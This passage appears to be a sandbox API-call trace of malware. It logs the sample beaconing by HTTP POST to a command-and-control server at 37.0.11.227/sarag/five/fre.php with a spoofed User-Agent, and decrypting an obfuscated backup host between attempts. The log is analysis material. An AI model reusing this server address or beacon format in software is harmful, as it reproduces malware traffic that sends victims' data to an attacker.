0x76ed0000 [0318.039] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0318.039] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0318.040] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0318.040] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0318.040] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0318.041] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0318.041] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0318.041] GetProcessHeap () returned 0x690000 [0318.041] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0318.041] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0318.041] GetProcessHeap () returned 0x690000 [0318.042] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab410 [0318.042] socket (af=2, type=1, protocol=6) returned 0xad0 [0318.042] connect (s=0xad0, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0318.069] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0318.069] GetProcessHeap () returned 0x690000 [0318.069] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0318.069] GetProcessHeap () returned 0x690000 [0318.069] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0318.070] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0318.071] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0318.071] GetProcessHeap () returned 0x690000 [0318.071] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afc80 [0318.071] GetProcessHeap () returned 0x690000 [0318.072] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0318.072] GetProcessHeap () returned 0x690000 [0318.072] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0318.072] GetProcessHeap () returned 0x690000 [0318.072] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0318.072] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0318.073] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0318.073] GetProcessHeap () returned 0x690000 [0318.073] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0318.073] GetProcessHeap () returned 0x690000 [0318.074] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0318.074] send (s=0xad0, buf=0x6ad508*, len=242, flags=0) returned 242 [0318.074] send (s=0xad0, buf=0x6aba40*, len=159, flags=0) returned 159 [0318.074] GetProcessHeap () returned 0x690000 [0318.074] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0318.074] recv (in: s=0xad0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0318.150] GetProcessHeap () returned 0x690000 [0318.150] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0318.151] GetProcessHeap () returned 0x690000 [0318.151] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0318.152] GetProcessHeap () returned 0x690000 [0318.152] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afc80 | out: hHeap=0x690000) returned 1 [0318.152] GetProcessHeap () returned 0x690000 [0318.153] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0318.153] closesocket (s=0xad0) returned 0 [0318.153] GetProcessHeap () returned 0x690000 [0318.153] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab410 | out: hHeap=0x690000) returned 1 [0318.153] GetProcessHeap () returned 0x690000 [0318.154] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0318.154] GetProcessHeap () returned 0x690000 [0318.154] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0318.154] GetProcessHeap () returned 0x690000 [0318.155] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0318.159] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1814) returned 0xad0 [0318.160] Sleep (dwMilliseconds=0xea60) [0318.162] GetProcessHeap () returned 0x690000 [0318.162] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0318.162] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.166] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0318.172] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.173] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0318.227] GetProcessHeap () returned 0x690000 [0318.227] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0318.228] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.295] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0318.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.296] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0318.297] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.297] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0318.297] GetProcessHeap () returned 0x690000 [0318.297] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0318.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.298] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0318.299] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.299] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0318.300] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.300] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0318.300] GetProcessHeap () returned 0x690000 [0318.300] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0318.301] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0318.301] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0318.302] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0318.302] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0318.303] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0318.303] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0318.304] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0318.305] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0318.305] GetProcessHeap () returned 0x690000 [0318.305] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0318.305] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0318.305] GetProcessHeap () returned 0x690000 [0318.306] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0318.306] GetProcessHeap () returned 0x690000 [0318.306] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0318.308] GetProcessHeap () returned 0x690000 [0318.308] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0318.308] GetProcessHeap () returned 0x690000 [0318.308] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0318.309] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.309] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0318.314] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.314] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0318.327] GetProcessHeap () returned 0x690000 [0318.327] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0318.330] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.330] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0318.331] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.332] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0318.332] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.333] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0318.333] GetProcessHeap () returned 0x690000 [0318.333] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0318.335] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.335] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0318.336] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.337] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0318.338] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.338] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0318.338] GetProcessHeap () returned 0x690000 [0318.338] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0318.339] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0318.339] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0318.340] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0318.340] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0318.341] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0318.341] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0318.342] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0318.342] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0318.342] GetProcessHeap () returned 0x690000 [0318.342] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0318.342] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0318.343] GetProcessHeap () returned 0x690000 [0318.343] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab320 [0318.343] socket (af=2, type=1, protocol=6) returned 0xad4 [0318.346] connect (s=0xad4, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0318.374] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0318.375] GetProcessHeap () returned 0x690000 [0318.375] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aee58 [0318.375] GetProcessHeap () returned 0x690000 [0318.375] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0318.376] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0318.377] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0318.377] GetProcessHeap () returned 0x690000 [0318.377] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0100 [0318.377] GetProcessHeap () returned 0x690000 [0318.377] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0318.377] GetProcessHeap () returned 0x690000 [0318.377] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0318.377] GetProcessHeap () returned 0x690000 [0318.377] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0318.378] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0318.379] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0318.379] GetProcessHeap () returned 0x690000 [0318.379] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0318.379] GetProcessHeap () returned 0x690000 [0318.379] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0318.379] send (s=0xad4, buf=0x6ad508*, len=242, flags=0) returned 242 [0318.380] send (s=0xad4, buf=0x6aba40*, len=159, flags=0) returned 159 [0318.380] GetProcessHeap () returned 0x690000 [0318.380] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0318.380] recv (in: s=0xad4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0318.446] GetProcessHeap () returned 0x690000 [0318.447] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0318.447] GetProcessHeap () returned 0x690000 [0318.447] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0318.447] GetProcessHeap () returned 0x690000 [0318.448] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0100 | out: hHeap=0x690000) returned 1 [0318.450] GetProcessHeap () returned 0x690000 [0318.451] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aee58 | out: hHeap=0x690000) returned 1 [0318.451] closesocket (s=0xad4) returned 0 [0318.451] GetProcessHeap () returned 0x690000 [0318.451] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab320 | out: hHeap=0x690000) returned 1 [0318.451] GetProcessHeap () returned 0x690000 [0318.452] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0318.452] GetProcessHeap () returned 0x690000 [0318.452] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0318.452] GetProcessHeap () returned 0x690000 [0318.452] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0318.452] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1818) returned 0xad4 [0318.454] Sleep (dwMilliseconds=0xea60) [0318.456] GetProcessHeap () returned 0x690000 [0318.456] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0318.457] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.457] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0318.466] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.467] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0318.475] GetProcessHeap () returned 0x690000 [0318.475] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0318.476] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.476] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0318.477] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.478] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0318.479] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.479] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0318.479] GetProcessHeap () returned 0x690000 [0318.479] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0318.480] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.481] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0318.482] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.482] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0318.485] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.533] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0318.533] GetProcessHeap () returned 0x690000 [0318.533] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0318.534] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0318.535] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0318.545] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0318.545] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0318.546] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0318.546] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0318.547] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0318.548] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0318.548] GetProcessHeap () returned 0x690000 [0318.548] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0318.548] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0318.548] GetProcessHeap () returned 0x690000 [0318.549] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0318.549] GetProcessHeap () returned 0x690000 [0318.549] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0318.549] GetProcessHeap () returned 0x690000 [0318.550] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0318.550] GetProcessHeap () returned 0x690000 [0318.550] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0318.550] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.551] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0318.558] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.559] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0318.568] GetProcessHeap () returned 0x690000 [0318.568] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0318.569] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.569] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0318.573] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.573] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0318.574] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.574] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0318.574] GetProcessHeap () returned 0x690000 [0318.575] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0318.576] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.576] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0318.577] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.577] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0318.578] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.578] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0318.578] GetProcessHeap () returned 0x690000 [0318.578] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0318.579] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0318.579] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0318.580] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0318.580] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0318.581] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0318.581] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0318.582] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0318.583] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0318.583] GetProcessHeap () returned 0x690000 [0318.583] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0318.583] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0318.583] GetProcessHeap () returned 0x690000 [0318.583] 